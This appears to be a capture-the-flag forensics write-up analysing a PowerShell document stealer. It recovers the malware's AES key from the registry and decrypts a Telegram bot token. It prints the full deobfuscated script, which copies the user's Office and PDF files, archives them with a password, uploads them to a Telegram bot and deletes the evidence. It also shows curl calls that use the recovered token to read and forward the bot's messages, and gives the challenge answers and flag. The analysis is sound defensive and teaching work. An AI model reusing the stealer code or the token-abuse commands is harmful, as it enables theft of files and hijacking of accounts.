HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\TypeLib;Version=73b183a05dbceb221d4fee9130a862b8
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib;Version=1e1bda5f9b5796efcf3503ce62e35e31
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib;Version=75cc2e7ffcbc8287696cf498ed550d50
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\TypeLib;Version=f81d5c059e46a3f46605260954d8df90
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib;Version=0bb10c0dc30b514517b1b0959567e54d
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\TypeLib;Version=9b3cf1b03c7b2ff2b169a59e43b8e402
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib;Version=3aeea17fa8391ae6f77327995157bd19
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib;Version=4d42f0f873cf170726d7a00a3e00cca0
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib;Version=0f1678fbc4a762d47459830f37a1f5df
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib;Version=55259ac1a82f2a96c89c1ad8836439c4
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\TypeLib;Version=4848a9617653eed03cab8011518d773f
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib;Version=570e2dfa593169aa0fcfa183ffa8baa6
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib;Version=8e1534343eb14fef76676c6910ddb9cc
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib;Version=4476d9cc30459b799504bfd12131b648
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib;Version=8c8f975d7cc97923d9c640c01990c798

Match: the script walks HKCU:\software\classes\Interface hashing "KeyName;ValueName" with MD5 until it finds the hard-coded digest 6ca24d7c7f6f6465afb82dacd1b0c71f (see h1/s9 in the deobfuscated script further down). The list above is the hashes of the Version values; the hit is the (default) value of one TypeLib key:

HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;(default)=6ca24d7c7f6f6465afb82dacd1b0c71f

Encryption Key (the data of that (default) value, which the script feeds to Rfc2898DeriveBytes as the password):

HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib
Value Name	Value Type	Data
(default)	RegSz	{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}
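The lookup is worth reproducing offline, because it is also what the hash list on this page is: for every value under Interface the script MD5-hashes "KeyName;ValueName" and returns the data of the first one matching its hard-coded digest. The Python below is an added example, not part of the original writeup or of the malware; it ports h1/s9 onto a constructed in-memory registry tree (the GUIDs and the key data are the page's, the tree layout and the decoy Version value are assumed). The caveat it encodes: the digest covers the key path as the script's Get-Item reports it (HKCU expanded to HKEY_CURRENT_USER, the remainder in the script's own spelling, subkeys as enumerated) plus the value name, with the default value named "(default)"; any other spelling of the path hashes to something else and the search misses.

```python
import hashlib

# Digest hard-coded in the deobfuscated script: s9 "HKCU:\software\classes\Interface" "6ca24d7c..."
TARGET_HASH = "6ca24d7c7f6f6465afb82dacd1b0c71f"
ROOT = r"HKEY_CURRENT_USER\software\classes\Interface"
KEY_GUID = "{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}"
KEY_PATH = ROOT + "\\" + KEY_GUID + "\\TypeLib"
KEY_DATA = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"


def h1(text):
    """Port of h1: MD5 over the UTF-8 bytes. The script emits uppercase hex and compares with
    PowerShell -eq, which is case-insensitive; lowercase here so a plain == does the same job."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_key(name, values=None, subkeys=None):
    """One key as Get-Item exposes it: .Name (full path, hive expanded), its value names, its subkeys."""
    return {"name": name, "values": dict(values or {}), "subkeys": list(subkeys or [])}


def find_value_by_hash(key, target):
    """Port of s9: hash "<KeyName>;<ValueName>" for each value; on a match return that value's data,
    otherwise recurse into the subkeys. None when nothing in the subtree matches."""
    target = target.lower()
    for value_name, data in key["values"].items():
        if h1(key["name"] + ";" + value_name) == target:
            return data
    for sub in key["subkeys"]:
        found = find_value_by_hash(sub, target)
        if found:
            return found
    return None


def enumerate_hashes(key):
    """Flatten the tree into ("<KeyName>;<ValueName>", md5) pairs: the listing this page was built from."""
    pairs = [(key["name"] + ";" + name, h1(key["name"] + ";" + name)) for name in key["values"]]
    for sub in key["subkeys"]:
        pairs.extend(enumerate_hashes(sub))
    return pairs


def build_sample_registry():
    """Constructed miniature of the Interface hive (not the evidence image): one decoy interface
    with only a Version value, plus the key the page identifies. "(default)" is how PowerShell
    names the default value, and that spelling is part of what gets hashed."""
    decoy = ROOT + r"\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}"
    return make_key(ROOT, subkeys=[
        make_key(decoy, subkeys=[make_key(decoy + r"\TypeLib", {"Version": "1.0"})]),
        make_key(ROOT + "\\" + KEY_GUID, subkeys=[make_key(KEY_PATH, {"(default)": KEY_DATA})]),
    ])


def recover_key(registry=None):
    """Run the script's own lookup: the value whose path hashes to TARGET_HASH is the AES password."""
    return find_value_by_hash(registry or build_sample_registry(), TARGET_HASH)


if __name__ == "__main__":
    for path, digest in enumerate_hashes(build_sample_registry()):
        print(path + "=" + digest)
    print("key:", recover_key())
```

Against a real export, replace build_sample_registry() with a walk of the hive (for example via python-registry over the NTUSER.DAT, building the same "HKEY_CURRENT_USER\..." names); the lookup itself does not change.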

Question 7:

[7/10] What is the attacker's Telegram username? (ie: username)
> Pirate_D_Mylan
[+] Correct!

HKCU\Environment (the script reads Update, GUID, bid, tid and hid from here, stored alongside the user's ordinary variables):

Value Name	Value Type	Data
OneDrive	RegExpandSz	C:\Users\IEUser\OneDrive
Path	RegExpandSz	C:\Users\IEUser\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\IEUser\AppData\Local\Programs\Python\Python37\;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
TEMP	RegExpandSz	%USERPROFILE%\AppData\Local\Temp
TMP	RegExpandSz	%USERPROFILE%\AppData\Local\Temp
PWS	RegSz	powershell
bid	RegBinary	CA-EA-55-6B-B7-FA-06-34-C6-3F-7C-12-F1-CC-AB-1A-5E-EC-CE-0F-45-15-31-47-FF-41-8D-71-E5-36-0E-CD-DC-E3-C2-29-B8-C6-EC-9A-92-21-6C-FF-F0-1E-A6-3C
hid	RegBinary	93-B4-54-30-62-04-62-83-C3-2A-DD-E1-96-25-F6-6F-5C-9F-F9-FE-38-F2-A3-CB-8B-EF-06-08-80-FB-42-96-5E-13-2D-E3-27-67-5E-01-65-93-79-92-CA-8A-0B-D8
tid	RegBinary	8F-57-5C-4D-35-34-0E-9E-BA-02-4A-9F-C6-07-8E-B7-7B-78-09-8C-8B-BE-BD-F8-7C-C0-0E-C4-FF-7E-BE-BC-CD-F4-E7-6D-D6-62-09-88-7C-70-C1-4A-39-80-8E-5A-86-28-C5-79-59-5A-37-3C-E3-E7-E9-80-A3-F0-D6-30-65-94-1E-EF-41-F3-72-6F-14-37-B5-53-89-B8-01-17
GUID	RegSz	06bbc6ad-a624-416f-8163-30410218a149
Update	RegDword	328656233

Key: {BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}

From environment:

$bid=caea556bb7fa0634c63f7c12f1ccab1a5eecce0f45153147ff418d71e5360ecddce3c229b8c6ec9a92216cfff01ea63c
$hid=93b4543062046283c32adde19625f66f5c9ff9fe38f2a3cb8bef060880fb42965e132de327675e0165937992ca8a0bd8
$tid=8f575c4d35340e9eba024a9fc6078eb77b78098c8bbebdf87cc00ec4ff7ebebccdf4e76dd66209887c70c14a39808e5a8628c579595a373ce3e7e980a3f0d63065941eef41f3726f1437b55389b80117

Decryption harness (decrypt is the script's own n9 routine, reproduced in the deobfuscated script further down, run with $m0 set to the key above):

# decrypt = n9: 32-byte salt prefix, Rfc2898DeriveBytes($m0, salt) -> 32-byte key + 16-byte IV, AES-CBC
# $m0 = '{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}'
$bid = [byte[]]@(0xCA,0xEA,0x55,0x6B,0xB7,0xFA,0x06,0x34,0xC6,0x3F,0x7C,0x12,0xF1,0xCC,0xAB,0x1A,0x5E,0xEC,0xCE,0x0F,0x45,0x15,0x31,0x47,0xFF,0x41,0x8D,0x71,0xE5,0x36,0x0E,0xCD,0xDC,0xE3,0xC2,0x29,0xB8,0xC6,0xEC,0x9A,0x92,0x21,0x6C,0xFF,0xF0,0x1E,0xA6,0x3C)
$hid = [byte[]]@(0x93,0xb4,0x54,0x30,0x62,0x04,0x62,0x83,0xc3,0x2a,0xdd,0xe1,0x96,0x25,0xf6,0x6f,0x5c,0x9f,0xf9,0xfe,0x38,0xf2,0xa3,0xcb,0x8b,0xef,0x06,0x08,0x80,0xfb,0x42,0x96,0x5e,0x13,0x2d,0xe3,0x27,0x67,0x5e,0x01,0x65,0x93,0x79,0x92,0xca,0x8a,0x0b,0xd8)
$tid = [byte[]]@(0x8f,0x57,0x5c,0x4d,0x35,0x34,0x0e,0x9e,0xba,0x02,0x4a,0x9f,0xc6,0x07,0x8e,0xb7,0x7b,0x78,0x09,0x8c,0x8b,0xbe,0xbd,0xf8,0x7c,0xc0,0x0e,0xc4,0xff,0x7e,0xbe,0xbc,0xcd,0xf4,0xe7,0x6d,0xd6,0x62,0x09,0x88,0x7c,0x70,0xc1,0x4a,0x39,0x80,0x8e,0x5a,0x86,0x28,0xc5,0x79,0x59,0x5a,0x37,0x3c,0xe3,0xe7,0xe9,0x80,0xa3,0xf0,0xd6,0x30,0x65,0x94,0x1e,0xef,0x41,0xf3,0x72,0x6f,0x14,0x37,0xb5,0x53,0x89,0xb8,0x01,0x17)
$bid1 = decrypt $bid;
$hid1 = decrypt $hid;
$tid1 = decrypt $tid;
$i0 = "$bid1`:$tid1";

Decrypted (bid is the bot ID, tid the bot token, hid the chat_id the script uploads to; $i0 is the full "id:token" the Bot API expects):

$bid=7035285918
$hid=6959962141
$tid=AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4
$i0=7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4
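The decrypt helper used above is the script's n9 routine. The Python below is an added example, not code from the writeup or from the malware, that reimplements it so the token can be recovered from the exported hive without executing the sample: split off the 32-byte salt, derive key||IV with PBKDF2-HMAC-SHA1 at 1000 iterations over the UTF-8 password (the defaults of Rfc2898DeriveBytes(string, byte[])), then AES-256-CBC with PKCS7 (AesManaged defaults). The three hex blobs and the key are the page's values; the assumption that two consecutive GetBytes() calls read contiguous bytes of a single PBKDF2 stream is mine. The AES step needs the cryptography or pycryptodome package; without either, the function reports None while the salt split, the KDF and the block-count bounds still run.

```python
import hashlib
from binascii import unhexlify

# (default) data of the matched TypeLib key; n9 passes this string to Rfc2898DeriveBytes as the password
PASSWORD = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"
SALT_LEN, KEY_LEN, IV_LEN = 32, 32, 16        # n9: 32-byte salt prefix, GetBytes(32) key, GetBytes(16) IV
PBKDF2_ITERATIONS, PBKDF2_HASH = 1000, "sha1"  # Rfc2898DeriveBytes(string, byte[]) defaults

# The three RegBinary values from HKCU\Environment, hex as listed on this page
BLOBS = {
    "bid": "caea556bb7fa0634c63f7c12f1ccab1a5eecce0f45153147ff418d71e5360ecddce3c229b8c6ec9a92216cfff01ea63c",
    "hid": "93b4543062046283c32adde19625f66f5c9ff9fe38f2a3cb8bef060880fb42965e132de327675e0165937992ca8a0bd8",
    "tid": "8f575c4d35340e9eba024a9fc6078eb77b78098c8bbebdf87cc00ec4ff7ebebccdf4e76dd66209887c70c14a39808e5a8628c579595a373ce3e7e980a3f0d63065941eef41f3726f1437b55389b80117",
}


def split_blob(blob):
    """n9 reads exactly 32 salt bytes and exits if fewer exist; everything after is AES-CBC ciphertext."""
    if len(blob) < SALT_LEN + 16 or (len(blob) - SALT_LEN) % 16:
        raise ValueError("blob is not 32-byte salt + whole AES blocks")
    return blob[:SALT_LEN], blob[SALT_LEN:]


def derive_key_iv(password, salt):
    """Assumption: GetBytes(32) then GetBytes(16) return the first 48 bytes of one PBKDF2 stream."""
    stream = hashlib.pbkdf2_hmac(PBKDF2_HASH, password.encode("utf-8"), salt,
                                 PBKDF2_ITERATIONS, KEY_LEN + IV_LEN)
    return stream[:KEY_LEN], stream[KEY_LEN:]


def aes_cbc_decrypt(key, iv, ciphertext):
    """AesManaged defaults: CBC, PKCS7. Uses 'cryptography' or pycryptodome when installed;
    returns None otherwise so the rest of the pipeline can still be exercised offline."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import padding
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        padded = dec.update(ciphertext) + dec.finalize()
        unpadder = padding.PKCS7(128).unpadder()
        return unpadder.update(padded) + unpadder.finalize()
    except ImportError:
        pass
    try:
        from Crypto.Cipher import AES
        from Crypto.Util.Padding import unpad
        return unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext), 16)
    except ImportError:
        return None


def decrypt_blob(hexblob, password=PASSWORD):
    """Full n9 equivalent for one hex blob: UTF-8 plaintext, or None without an AES backend."""
    salt, ciphertext = split_blob(unhexlify(hexblob))
    key, iv = derive_key_iv(password, salt)
    plaintext = aes_cbc_decrypt(key, iv, ciphertext)
    return None if plaintext is None else plaintext.decode("utf-8")


def plaintext_length_bounds(hexblob):
    """Without decrypting: CBC+PKCS7 means (blocks-1)*16 <= len(plaintext) <= blocks*16-1,
    so a 48-byte blob holds at most 15 characters (a numeric ID) and an 80-byte one 32..47 (a token)."""
    _, ciphertext = split_blob(unhexlify(hexblob))
    blocks = len(ciphertext) // 16
    return (blocks - 1) * 16, blocks * 16 - 1


def recover_bot_identity(blobs=BLOBS, password=PASSWORD):
    """Rebuild $i0 = "$bid1`:$tid1" (the Bot API token) plus the chat_id (hid) the script uploads to."""
    out = {name: decrypt_blob(hexblob, password) for name, hexblob in blobs.items()}
    if any(value is None for value in out.values()):
        return None
    out["bot_token"] = out["bid"] + ":" + out["tid"]
    return out


if __name__ == "__main__":
    for name, hexblob in BLOBS.items():
        print(name, "plaintext length bounds:", plaintext_length_bounds(hexblob))
    print(recover_bot_identity())
```

The length bounds are a useful sanity check before any key material is available: they already say which two blobs are short numeric IDs and which one is the token, which matches the roles bid/hid/tid play in the script.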

Telegram Bot (getMe with the recovered token identifies the bot; getChat on hid, the chat_id the script uploads documents to, identifies the operator's account):

curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getMe' | jq .
{
  "ok": true,
  "result": {
    "id": 7035285918,
    "is_bot": true,
    "first_name": "HTBot-01",
    "username": "ca1_htbot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false,
    "can_connect_to_business": false
  }
}

https://core.telegram.org/bots/api#getchat

curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getChat?chat_id=6959962141' | jq .
{
  "ok": true,
  "result": {
    "id": 6959962141,
    "first_name": "Truong",
    "last_name": "D.Mylan",
    "username": "Pirate_D_Mylan",
    "type": "private",
    "active_usernames": [
      "Pirate_D_Mylan"
    ],
    "max_reaction_count": 11,
    "accent_color_id": 6
  }
}

Question 8:

[8/10] What day did the attacker's server first send a 'new-connection' message? (Format: DD/MM/YYYY)
> 18/04/2024
[+] Correct!

From question 1? 1713451126 = GMT: Thursday, April 18, 2024 2:38:46 PM

Question 9

[9/10] What's the password for the 7z archive
> arameter-none
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getChatMember?chat_id=6959962141&user_id=6959962141,' | jq .
{
  "ok": true,
  "result": {
    "user": {
      "id": 6959962141,
      "is_bot": false,
      "first_name": "Truong",
      "last_name": "D.Mylan",
      "username": "Pirate_D_Mylan"
    },
    "status": "member"
  }
}
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/sendMessage?chat_id=6959962141&text=test' | jq .
{
  "ok": false,
  "error_code": 403,
  "description": "Forbidden: bot was blocked by the user"
}

How We Were Able to Infiltrate Attacker Telegram Bots https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/

Bot Token: bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4 Attacker Chat ID: 6959962141

Get Updates: Chat ID: Message ID:

https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getUpdates

Forwarding all messages to my chat with bot:

(curl -useb "https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getUpdates").Content
{"ok":true,"result":[{"update_id":328656365,
"message":{"message_id":8372,"from":{"id":1858014168,"is_bot":false,"first_name":"Yannis","language_code":"en"},"chat":{"id":1858014168,"first_name":"Yannis","type":"private"},"date":1716237187,"text":"/start","entities":[{"offset":0,"length":6,"type":"bot_command"}]}},{"update_id":328656366,
"message":{"message_id":8373,"from":{"id":7113801243,"is_bot":false,"first_name":"Matt","language_code":"en"},"chat":{"id":7113801243,"first_name":"Matt","type":"private"},"date":1716237470,"text":"/start","entities":[{"offset":0,"length":6,"type":"bot_command"}]}}]}

Parameter description quoted from the Checkmarx article above (the example values are the article's, not this challenge's):

    attacker_bot_token ⇒ The attacker’s bot token we found in the first step (in this case: 6414966437:AAHtThsoeAj36fZY4941ZVfnzRpMQXVXz_Y)
    attacker_chat_id ⇒ The attacker’s chat ID which we found in the first step (in this case: 6200912483)
    my_chat_id ⇒ My chat ID, which we found in the previous step (in this case: 6348918997)
    message_id ⇒ The message ID we found in the previous step (in this case: 2170)

curl -Uri "https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/forwardMessage" -Method POST -ContentType "application/json" -Body '{"from_chat_id":"6959962141", "chat_id":"7113801243", "message_id":"8372"}'

curl -Uri "https://api.telegram.org/bot/forwardMessage" -Method POST -ContentType "application/json" -Body '{"from_chat_id":"{attacker_chat_id}", "chat_id":"{my_chat_id}", "message_id":"{message_id}"}'

Decoding the stager's Base64 + raw-inflate payload with CyberChef: https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=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&oeol=VT

Decoding in PowerShell with the stager's own one-liner, followed by the deobfuscated script it yields:

( New-oBjeCt sysTem.IO.STREaMREadER((New-oBjeCt system.io.cOmpReSSIoN.DefLaTeSTream([IO.MemOrYstreAm] [sYSTeM.convErT]::FrombaSe64StrING( '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') ,[IO.comPressiOn.coMpReSsIOnmODe]::deCOMPress ) ) , [SYStem.TEXT.ENcODiNG]::ascII)).Readtoend() |Out-String
[System.Net.ServicePointManager]::SecurityProtocol=@("Tls12","Tls11","Tls","Ssl3")
$a1=gp "HKCU:\\Environment"
function h1($j0) {
    $v4 = [System.Security.Cryptography.HashAlgorithm]::Create('md5')
    $x3 = $v4.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($j0))
    $n6 = [System.BitConverter]::ToString($x3)
    return $n6.Replace('-', '')
}
$j2=$a1.Update
$F2=$a1.guid
$g1=$a1.bid
$y3=$a1.tid
$j5=$a1.hid
function s9($n1, $x8) {
    $k7 = gi $n1
    foreach($b5 in $k7.Property){
        $u6 = $k7.Name + ";" + $b5
        $x3 = h1 $u6
        if($x8 -eq $x3){
            return ((gp $n1 -Name $b5).$b5)
        }
    }
    foreach($n2 in $k7.GetSubkeyNames()){
        $v8 = s9 ($n1 + "\" + $n2) $x8
        if($v8.Length -gt 0){
            return $v8
        }
    }
    return ""
}
$m0 = s9 "HKCU:\software\classes\Interface" "6ca24d7c7f6f6465afb82dacd1b0c71f"
function n9 {
    param (
        [byte[]]$n3
    )
    $c4 = New-Object System.IO.MemoryStream($n3, 0, $n3.Length)
    $c5 = New-Object Byte[](32)
    $x2 = $c4.Read($c5, 0, $c5.Length)
    if ($x2 -ne $c5.Length) {
        exit
    }
    $b5 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($m0, $c5)
    $b7  = $b5.GetBytes(32)
    $v9   = $b5.GetBytes(16)
    $h5 = New-Object Security.Cryptography.AesManaged
    $e3 = $h5.CreateDecryptor($b7, $v9)
    $w5 = New-Object IO.MemoryStream
    $q7 = New-Object System.Security.Cryptography.CryptoStream(
        $c4, $e3, [System.Security.Cryptography.CryptoStreamMode]::Read)
    $q7.CopyTo($w5)
    $w5.Position = 0
    $y5 = New-Object IO.StreamReader($w5)
    $u9 = $y5.ReadToEnd()
    $y5.Dispose()
    $q7.Dispose()
    $w5.Dispose()
    $c4.Dispose()
    return $u9
}
$j51 = n9 $j5
$y31 = n9 $y3
$g11 = n9 $g1
$i0 = "$g11`:$y31"
$s74=@('.doc','.docx','.xls','.xlsx','.ppt','.pptx','.pdf')
$l01="$env:temp\documents_$((Get-Date).ToString('yyyyMMddHHmmss')).csv"
$w51="$env:temp\documents_$((Get-Date).ToString('yyyyMMddHHmmss')).7z"
$h75=$env:temp
$w51s=Get-ChildItem -Path ([System.IO.Path]::Combine($env:USERPROFILE,'Documents')) -Recurse -ErrorAction SilentlyContinue|Where-Object{$s74 -contains $_.Extension}|Select-Object Name,FullName,LastWriteTime,Length
$w51s|Export-Csv -Path $l01 -Encoding Unicode
$w51s|ForEach-Object{Copy-Item -Path $_.FullName -Destination ([System.IO.Path]::Combine($h75,$_.Name)) -Force}
$v13=[System.Text.Encoding]::ascii
& 'C:\Program Files\7-Zip\7z.exe' a -t7z -mx5 -parameter-none $w51 $l01 $w51s.FullName|Out-Null
Add-Type -AssemblyName System.Net.Http
$form=new-object System.Net.Http.MultipartFormDataContent
$form.Add($(New-Object System.Net.Http.StringContent $j51),'chat_id')
$Content=[System.IO.File]::ReadAllBytes($w51)
$n82=New-Object System.Net.Http.ByteArrayContent ($Content,0,$Content.Length)
$n82.Headers.Add('Content-Type','text/plain')
$m63=$v13.getstring($v13.getbytes("$($env:COMPUTERNAME).7z"))
$form.Add($n82,'document',$m63)
$ms=new-object System.IO.MemoryStream
$form.CopyToAsync($ms).Wait()
irm -Method Post -Body $ms.ToArray() -Uri "https://api.telegram.org/bot$i0/sendDocument" -ContentType $form.Headers.ContentType.ToString()
$w51s|ForEach-Object{Remove-Item -Path ([System.IO.Path]::Combine($h75,$_.Name)) -Force}
ri -Path $l01 -Force
ri -Path $w51 -Force

Encrypted archive (7zAES; the listing works without the password because the script did not pass -mhe=on, so only file contents are encrypted and the file names stay in the clear):

$ 7z l -slt DESKTOP.7z

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 3627868 bytes (3543 KiB)

Listing archive: DESKTOP.7z

--
Path = DESKTOP.7z
Type = 7z
Physical Size = 3627868
Headers Size = 300
Method = LZMA2:22 7zAES
Solid = +
Blocks = 1

----------
Path = documents_20240418220516.csv
Size = 516
Packed Size = 3627568
Modified = 2024-04-18 11:05:16.1378091
Attributes = A
CRC = 955298D3
Encrypted = +
Method = LZMA2:22 7zAES:19
Block = 0

Path = Explosive_Materials_Acquisition_Report_Final_Stylish.pdf
Size = 3667983
Packed Size =
Modified = 2024-04-16 09:14:24.8331250
Attributes = RA
CRC = 80BDD4E7
Encrypted = +
Method = LZMA2:22 7zAES:19
Block = 0
& 'C:\Program Files\7-Zip\7z.exe' a -t7z -mx5 -parameter-none $w51 $l01 $w51s.FullName|Out-Null

Password: 7-Zip has no -parameter switch; it parses -parameter-none as the -p{password} switch, so everything after -p is the password: arameter-none

Decrypt:

7z x DESKTOP.7z

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 3627868 bytes (3543 KiB)

Extracting archive: DESKTOP.7z
--
Path = DESKTOP.7z
Type = 7z
Physical Size = 3627868
Headers Size = 300
Method = LZMA2:22 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):arameter-none
Everything is Ok

Files: 2
Size:       3668499
Compressed: 3627868

Question 10

[10/10] Submit the md5sum of the 2 files in the archive that the attacker exfiltrated (sort hashes, connect with '_', ie: 5f19a..._d9fc0...)
> 83aa3b16ba6a648c133839c8f4af6af9_ffcedf790ce7fe09e858a7ee51773bcd
[+] Correct!

[+] Here is the flag: HTB{t3l3gr4m_b4ckf1r3d!!!_cca8fe0565dfb01167e6ac4505798390}
$ md5sum documents_20240418220516.csv Explosive_Materials_Acquisition_Report_Final_Stylish.pdf

83aa3b16ba6a648c133839c8f4af6af9  documents_20240418220516.csv
ffcedf790ce7fe09e858a7ee51773bcd  Explosive_Materials_Acquisition_Report_Final_Stylish.pdf

Flag: HTB{t3l3gr4m_b4ckf1r3d!!!_cca8fe0565dfb01167e6ac4505798390}